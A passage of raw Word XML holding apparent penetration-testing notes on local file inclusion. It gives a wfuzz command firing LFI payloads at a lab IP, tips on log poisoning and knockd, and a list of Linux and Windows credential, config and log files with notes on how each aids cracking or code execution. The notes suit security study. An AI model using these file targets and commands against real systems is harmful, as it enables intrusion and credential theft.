        </w:rPr>
        <w:t xml:space="preserve"> – backups</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa_2023, id_ed25519_2022 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– versioned backups</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_key, id_sshkey, ssh_key, ssh_private_key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/log/apache2/access.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/auth.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for LFI Log Poisoning (you can look at the section "Log Poisoning via LFI section")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">etc/knockd.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if you can open any hidden ports. Look at the knockd section for more information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use wfuzz to see which files you have access to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/LFI\ payloads.txt --hw 0 http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.167.80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/console/file.php?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In one writeup, they recommended looking at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/apache2/error.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but I still have yet to see that used in an attack vector. Same with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C58">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8df9j5ppig5m" w:id="235"/>
      <w:bookmarkEnd w:id="235"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive LFI List</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lists user accounts; can help identify usernames for brute force or privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Contains password hashes (if readable); can be cracked offline for login access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/issue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Displays OS/version info; useful for tailoring exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/group</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Reveals user group memberships; helps identify privilege levels.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hostname</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Gives the machine's hostname; aids in internal reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/apache/access.log, /var/log/apache2/access.log, /var/log/httpd/access_log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Web access logs; can be poisoned with PHP code and then included to achieve RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/apache/error.log, /var/log/apache2/error.log, /var/log/httpd/error_log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Same as access logs; can be poisoned with malicious code for RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/messages</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: General system logs; may reveal credentials or system activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/cron.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lists scheduled tasks; may expose paths or command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/auth.log:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authentication attempts; can expose usernames and login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/wp-config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: WordPress config file; contains DB creds and salts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/configuration.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Joomla config file; contains DB creds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/inc/header.inc.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Dolphin CMS config; contains DB info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/sites/default/settings.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Drupal config; holds DB access info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/configuration.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Mambo CMS config; same as above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Generic PHP app config; often includes sensitive credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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t xml:space="preserve">Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\System32\drivers\etc\hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Shows hostname-to-IP mappings; useful in internal targeting or domain spoofing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\Panther\Unattend*/Autounattend*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Setup files often containing plaintext admin passwords and setup info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32\sysprep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: May contain leftover scripts or config leaks from image preparation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\inetpub\wwwroot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Default IIS web root; can help locate the web app codebase.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\inetpub\wwwroot\web.config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Web config file; may leak DB strings or authentication data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\inetpub\logs\logfiles</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: IIS logs; can be poisoned or used for recon like Apache logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="436"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\inetpub\logs\LogFiles\W3SVC1\:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IIS logs</w:t>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ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
